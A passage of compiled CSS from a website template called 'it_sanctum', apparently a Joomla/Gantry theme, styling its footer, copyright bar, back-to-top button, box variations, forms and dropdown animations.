/* line 1, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
#g-mainbottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
#g-mainbottom h1, #g-mainbottom h2, #g-mainbottom h3, #g-mainbottom h4, #g-mainbottom h5, #g-mainbottom h6, #g-mainbottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_mainbottom.scss */
  #g-mainbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_extension.scss */
#g-extension {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_extension.scss */
#g-extension h1, #g-extension h2, #g-extension h3, #g-extension h4, #g-extension h5, #g-extension h6, #g-extension strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_extension.scss */
  #g-extension {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_additional.scss */
#g-additional {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_additional.scss */
#g-additional h1, #g-additional h2, #g-additional h3, #g-additional h4, #g-additional h5, #g-additional h6, #g-additional strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_additional.scss */
  #g-additional {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_prebottom.scss */
#g-prebottom {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_prebottom.scss */
#g-prebottom h1, #g-prebottom h2, #g-prebottom h3, #g-prebottom h4, #g-prebottom h5, #g-prebottom h6, #g-prebottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_prebottom.scss */
  #g-prebottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_bottom.scss */
#g-bottom {
  padding: 3rem 0;
  background-color: #f7f7f7;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_bottom.scss */
#g-bottom h1, #g-bottom h2, #g-bottom h3, #g-bottom h4, #g-bottom h5, #g-bottom h6, #g-bottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_bottom.scss */
  #g-bottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
#g-afterbottom {
  padding: 3rem 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
#g-afterbottom h1, #g-afterbottom h2, #g-afterbottom h3, #g-afterbottom h4, #g-afterbottom h5, #g-afterbottom h6, #g-afterbottom strong {
  color: #282828;
}
@media print {
  /* line 17, templates/it_sanctum/scss/sanctum/_afterbottom.scss */
  #g-afterbottom {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_last.scss */
#g-last {
  padding: 3rem 0;
  background-color: #fff;
  background-image: url('../../images/doves.png');
  background-repeat: no-repeat;
  background-size: auto;
  background-attachment: scroll;
  background-position: right center;
  color: #959595;
}
/* line 12, templates/it_sanctum/scss/sanctum/_last.scss */
#g-last h1, #g-last h2, #g-last h3, #g-last h4, #g-last h5, #g-last h6, #g-last strong {
  color: #008056;
}
@media print {
  /* line 18, templates/it_sanctum/scss/sanctum/_last.scss */
  #g-last {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer {
  padding: 3rem 0;
  background-color: #282828;
  background-image: url('../../images/footer.jpg');
  background-repeat: no-repeat;
  background-size: cover;
  background-attachment: scroll;
  color: #6f6f6f;
}
/* line 11, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer h1, #g-footer h2, #g-footer h3, #g-footer h4, #g-footer h5, #g-footer h6, #g-footer strong {
  color: #fff;
}
/* line 14, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer a {
  color: #a2a2a2;
}
/* line 16, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer a:hover {
  color: #fff;
}
/* line 20, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 21, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-title:before, #g-footer .g-title:after {
  display: none;
}
/* line 26, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 27, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 34, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 35, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-item {
  flex-basis: 100%;
  margin-bottom: 1.563rem;
}
/* line 38, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-item:last-child {
  margin-bottom: 0;
}
/* line 42, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-title {
  font-size: 1.875rem;
  line-height: 2rem;
}
/* line 46, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-features2-particle .g-features2-particle-icon {
  color: #fff;
  font-size: 90%;
}
/* line 52, templates/it_sanctum/scss/sanctum/_footer.scss */
/* line 53, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a {
  padding: 0.625rem;
  width: 3rem;
  height: 3rem;
  line-height: 1.5rem;
  color: #959595;
  margin: 0;
  border: none;
  background: rgba(0, 0, 0, 0.2);
  text-align: center;
  -webkit-transition: background 0.2s;
  -moz-transition: background 0.2s;
  transition: background 0.2s;
}
/* line 64, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a:first-child {
  border: none;
}
/* line 67, templates/it_sanctum/scss/sanctum/_footer.scss */
#g-footer .g-social a:hover {
  color: #4f953b;
  background: #fff;
}
@media print {
  /* line 76, templates/it_sanctum/scss/sanctum/_footer.scss */
  #g-footer {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright {
  padding: 10px 0;
  background-color: #fff;
  color: #959595;
}
/* line 11, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright h1, #g-copyright h2, #g-copyright h3, #g-copyright h4, #g-copyright h5, #g-copyright h6, #g-copyright strong {
  color: #959595;
}
/* line 14, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright a {
  color: #4f953b;
}
/* line 16, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright a:hover {
  color: #c8c8c8;
}
/* line 20, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright .g-block {
  text-align: center;
}
@media only all and (max-width: 47.938rem) {
  #g-copyright {
    text-align: center;
  }
}
/* line 26, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright:before {
  left: 50%;
  margin-bottom: -50px;
  content: "";
  position: relative;
  display: block;
  width: 50px;
  height: 50px;
  -webkit-transform: translateX(-50%) rotate(45deg);
  transform: translateX(-50%) rotate(45deg);
  z-index: 10;
}
/* line 38, templates/it_sanctum/scss/sanctum/_copyright.scss */
#g-copyright:before {
  top: -35px;
  background: #fff;
}
@media print {
  /* line 45, templates/it_sanctum/scss/sanctum/_copyright.scss */
  #g-copyright {
    background: #fff !important;
    color: #000 !important;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top {
  position: fixed;
  bottom: 0;
  left: 0;
  height: 0;
  width: 0;
}
/* line 7, templates/it_sanctum/scss/sanctum/_to-top.scss */
/* line 8, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  border-radius: 3px;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
/* line 19, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  #g-to-top .style1 #g-totop-button {
    display: none;
  }
}
/* line 25, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style1 #g-totop-button.totopfixed {
  bottom: 28px;
}
/* line 30, templates/it_sanctum/scss/sanctum/_to-top.scss */
/* line 31, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button {
  position: fixed;
  bottom: -40px;
  right: 28px;
  background: rgba(0, 0, 0, 0.4);
  color: #fff;
  border-radius: 50%;
  padding: 6px 13px;
  z-index: 999;
  outline: none;
  -webkit-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  -moz-transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
  transition: all 0.3s cubic-bezier(0.55, 0, 0.1, 1) 0s;
}
/* line 42, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button:hover {
  background: #4f953b;
}
@media only all and (max-width: 47.938rem) {
  #g-to-top .style2 #g-totop-button {
    display: none;
  }
}
/* line 48, templates/it_sanctum/scss/sanctum/_to-top.scss */
#g-to-top .style2 #g-totop-button.totopfixed {
  bottom: 28px;
}
/* line 1, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 4, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 5, templates/it_sanctum/scss/sanctum/_variations.scss */
.flush .g-container > .g-grid > .g-block > .g-content {
  margin: 0;
  padding: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 15, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title, .title-center .g-title {
  text-align: center;
  margin-bottom: 40px;
}
/* line 18, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title:before, .title-center .g-title:before {
  content: "\f432";
  font-family: "Ionicons";
  font-size: 36px;
  color: #4f953b;
  margin: 0 auto;
  display: block;
}
@media only all and (max-width: 47.938rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    display: none;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .text-center .g-title:before, .title-center .g-title:before {
    width: 80px;
  }
}
/* line 32, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-title:after, .title-center .g-title:after {
  display: none;
}
/* line 36, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 37, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_variations.scss */
.text-center .g-particle-intro .g-title:before, .title-center .g-particle-intro .g-title:before, .text-center .g-particle-intro .g-title:after, .title-center .g-particle-intro .g-title:after {
  display: none;
}
/* line 45, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 46, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 10px;
}
/* line 47, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-title:before, .title-border .g-title:after {
  display: none;
}
/* line 53, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 54, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-border .g-particle-intro .g-title {
  border-bottom: none;
  padding-bottom: 0;
}
/* line 61, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 62, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 63, templates/it_sanctum/scss/sanctum/_variations.scss */
.title-clean .g-title:before, .title-clean .g-title:after {
  display: none;
}
/* line 69, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 70, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 71, templates/it_sanctum/scss/sanctum/_variations.scss */
[class*="box"].g-block > .g-content {
  margin: 1.5625rem;
}
/* line 77, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 78, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable, .box1.widget, .box1.g-outer-box, .box1 > .g-content {
  padding: 25px;
  border: 1px solid #ddd;
  background: #fff;
}
/* line 85, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-title, .box1.widget .g-title, .box1.g-outer-box .g-title, .box1 > .g-content .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 15px;
}
/* line 86, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-title:before, .box1.widget .g-title:before, .box1.g-outer-box .g-title:before, .box1 > .g-content .g-title:before, .box1.moduletable .g-title:after, .box1.widget .g-title:after, .box1.g-outer-box .g-title:after, .box1 > .g-content .g-title:after {
  display: none;
}
/* line 92, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 93, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-particle-intro .g-title, .box1.widget .g-particle-intro .g-title, .box1.g-outer-box .g-particle-intro .g-title, .box1 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 96, templates/it_sanctum/scss/sanctum/_variations.scss */
.box1.moduletable .g-particle-intro .g-title-separator, .box1.widget .g-particle-intro .g-title-separator, .box1.g-outer-box .g-particle-intro .g-title-separator, .box1 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 103, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 104, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable, .box2.widget, .box2.g-outer-box, .box2 > .g-content {
  padding: 25px;
  border: 1px solid #ddd;
  background: #f1f1f1;
}
/* line 111, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-title, .box2.widget .g-title, .box2.g-outer-box .g-title, .box2 > .g-content .g-title {
  border-bottom: 1px solid #ddd;
  padding-bottom: 15px;
}
/* line 112, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-title:before, .box2.widget .g-title:before, .box2.g-outer-box .g-title:before, .box2 > .g-content .g-title:before, .box2.moduletable .g-title:after, .box2.widget .g-title:after, .box2.g-outer-box .g-title:after, .box2 > .g-content .g-title:after {
  display: none;
}
/* line 118, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 119, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-particle-intro .g-title, .box2.widget .g-particle-intro .g-title, .box2.g-outer-box .g-particle-intro .g-title, .box2 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 122, templates/it_sanctum/scss/sanctum/_variations.scss */
.box2.moduletable .g-particle-intro .g-title-separator, .box2.widget .g-particle-intro .g-title-separator, .box2.g-outer-box .g-particle-intro .g-title-separator, .box2 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 129, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 130, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable, .box3.widget, .box3.g-outer-box, .box3 > .g-content {
  padding: 25px;
  background: #4f953b;
  color: #fff;
}
/* line 137, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-title, .box3.widget .g-title, .box3.g-outer-box .g-title, .box3 > .g-content .g-title {
  color: #fff !important;
  border-bottom: 1px solid #73bf5d;
  padding-bottom: 15px;
}
/* line 138, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-title:before, .box3.widget .g-title:before, .box3.g-outer-box .g-title:before, .box3 > .g-content .g-title:before, .box3.moduletable .g-title:after, .box3.widget .g-title:after, .box3.g-outer-box .g-title:after, .box3 > .g-content .g-title:after {
  display: none;
}
/* line 145, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 146, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-particle-intro .g-title, .box3.widget .g-particle-intro .g-title, .box3.g-outer-box .g-particle-intro .g-title, .box3 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 149, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .g-particle-intro .g-title-separator, .box3.widget .g-particle-intro .g-title-separator, .box3.g-outer-box .g-particle-intro .g-title-separator, .box3 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 153, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .button, .box3.widget .button, .box3.g-outer-box .button, .box3 > .g-content .button {
  background: #282828;
}
/* line 155, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable .button:hover, .box3.widget .button:hover, .box3.g-outer-box .button:hover, .box3 > .g-content .button:hover {
  background: #424242;
}
/* line 159, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable a, .box3.widget a, .box3.g-outer-box a, .box3 > .g-content a {
  color: #ddd;
}
/* line 161, templates/it_sanctum/scss/sanctum/_variations.scss */
.box3.moduletable a:hover, .box3.widget a:hover, .box3.g-outer-box a:hover, .box3 > .g-content a:hover {
  color: #d0d0d0;
}
/* line 168, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 169, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable, .box4.widget, .box4.g-outer-box, .box4 > .g-content {
  padding: 25px;
  background: #282828;
  color: #fff;
}
/* line 176, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-title, .box4.widget .g-title, .box4.g-outer-box .g-title, .box4 > .g-content .g-title {
  color: #fff !important;
  border-bottom: 1px solid #424242;
  padding-bottom: 15px;
}
/* line 177, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-title:before, .box4.widget .g-title:before, .box4.g-outer-box .g-title:before, .box4 > .g-content .g-title:before, .box4.moduletable .g-title:after, .box4.widget .g-title:after, .box4.g-outer-box .g-title:after, .box4 > .g-content .g-title:after {
  display: none;
}
/* line 184, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 185, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-particle-intro .g-title, .box4.widget .g-particle-intro .g-title, .box4.g-outer-box .g-particle-intro .g-title, .box4 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
/* line 188, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .g-particle-intro .g-title-separator, .box4.widget .g-particle-intro .g-title-separator, .box4.g-outer-box .g-particle-intro .g-title-separator, .box4 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
/* line 192, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 193, templates/it_sanctum/scss/sanctum/_variations.scss */
.box4.moduletable .button:hover, .box4.widget .button:hover, .box4.g-outer-box .button:hover, .box4 > .g-content .button:hover {
  background: #63b84b;
}
/* line 200, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 201, templates/it_sanctum/scss/sanctum/_variations.scss */
.shadow .g-content {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
/* line 206, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 207, templates/it_sanctum/scss/sanctum/_variations.scss */
.shadow2 .g-content {
  box-shadow: 0 0 4px rgba(0, 0, 0, 0.15);
}
/* line 212, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 213, templates/it_sanctum/scss/sanctum/_variations.scss */
.disabled .g-content {
  opacity: 0.4;
}
/* line 218, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 219, templates/it_sanctum/scss/sanctum/_variations.scss */
.square .g-content {
  border-radius: none;
}
/* line 224, templates/it_sanctum/scss/sanctum/_variations.scss */
/* line 225, templates/it_sanctum/scss/sanctum/_variations.scss */
.rounded .g-content {
  border-radius: 0;
}
/* line 1, templates/it_sanctum/scss/sanctum/_tables.scss */
table {
  border: 1px solid #e2e2e2;
}
/* line 5, templates/it_sanctum/scss/sanctum/_tables.scss */
th {
  background: #eaeaea;
  padding: 0.5rem;
}
/* line 10, templates/it_sanctum/scss/sanctum/_tables.scss */
td {
  padding: 0.5rem;
  border: 1px solid #e2e2e2;
}
/* line 1, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea, select[multiple=multiple] {
  background-color: white;
  border: 1px solid #ddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
/* line 6, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea:hover, select[multiple=multiple]:hover {
  border-color: #c4c4c4;
}
/* line 10, templates/it_sanctum/scss/sanctum/_forms.scss */
textarea:focus, select[multiple=multiple]:focus {
  border-color: #4f953b;
}
/* line 15, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]), textarea {
  background-color: white;
  border: 1px solid #ddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
/* line 21, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"]:hover, input[type="date"]:hover, input[type="datetime"]:hover, input[type="datetime-local"]:hover, input[type="email"]:hover, input[type="month"]:hover, input[type="number"]:hover, input[type="password"]:hover, input[type="search"]:hover, input[type="tel"]:hover, input[type="text"]:hover, input[type="time"]:hover, input[type="url"]:hover, input[type="week"]:hover, input:not([type]):hover, textarea:hover {
  border-color: #c4c4c4;
}
/* line 25, templates/it_sanctum/scss/sanctum/_forms.scss */
input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="password"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="text"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, input:not([type]):focus, textarea:focus {
  border-color: #4f953b;
}
/* line 1, templates/it_sanctum/scss/sanctum/_error.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_error.scss */
body.outline-_error h1 {
  margin: 30px 0;
  text-align: center;
}
/* line 6, templates/it_sanctum/scss/sanctum/_error.scss */
body.outline-_error .g-offcanvas-toggle:not(.offcanvas-toggle-particle) {
  display: none;
}
/* line 1, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a {
  display: inline-block;
  padding: 8px 10px;
  background: none;
  color: #959595;
  font-size: 0.9rem;
  margin-left: -4px;
  border-right: 1px solid #f0f0f0;
}
/* line 10, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
/* line 14, templates/it_sanctum/scss/sanctum/_social.scss */
.g-social a:hover {
  color: #4f953b;
}
/* line 20, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 21, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 22, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a {
  padding: 0 10px;
  color: #959595;
  margin: 0;
  border: none;
}
/* line 27, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a:first-child {
  border: none;
}
/* line 30, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-social a:hover {
  color: #4f953b;
}
/* line 37, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 38, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 39, templates/it_sanctum/scss/sanctum/_social.scss */
/* line 40, templates/it_sanctum/scss/sanctum/_social.scss */
#g-copyright .g-block:last-child .g-social {
  margin-right: -10px;
}
@media only all and (max-width: 47.938rem) {
  #g-copyright .g-block:last-child .g-social {
    margin-right: 0;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 2, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 3, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
/* line 7, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
/* line 11, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
/* line 16, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-standard .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
/* line 22, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
/* line 23, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
/* line 27, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
/* line 31, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
/* line 36, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
.g-main-nav .g-fullwidth > .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
@-webkit-keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -moz-transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-zoom {
  /* line 44, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
    -moz-transform: scale3d(0.8, 0.8, 0.8);
    -ms-transform: scale3d(0.8, 0.8, 0.8);
    -o-transform: scale3d(0.8, 0.8, 0.8);
    transform: scale3d(0.8, 0.8, 0.8);
  }
  /* line 48, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -moz-transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-fade-in-up {
  /* line 54, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
    -moz-transform: translate3d(0, 30px, 0);
    -ms-transform: translate3d(0, 30px, 0);
    -o-transform: translate3d(0, 30px, 0);
    transform: translate3d(0, 30px, 0);
  }
  /* line 58, templates/it_sanctum/scss/sanctum/_dropdownanimations.scss */
  100% {
    opacity: 1;
  }
}
/* line 1, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
/* line 5, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-grid {
  margin-bottom: 2.3445rem;
}
/* line 8, templates/it_sanctum/scss/sanctum/_contentarray.scss */
.g-content-array .g-grid:last-child {
  margin-bottom: 0;
}
/* line 11, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 12, templates/it_sanctum/scss/sanctum/_contentarray.scss */
/* line 13, templates/it_sanctum/scss/sanctum/_contentarray.scss */
@media only all and (max-width: 47.938rem) {
  .g-content-array .g-grid:last-child .g-block:last-child .g-array-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.938rem) {
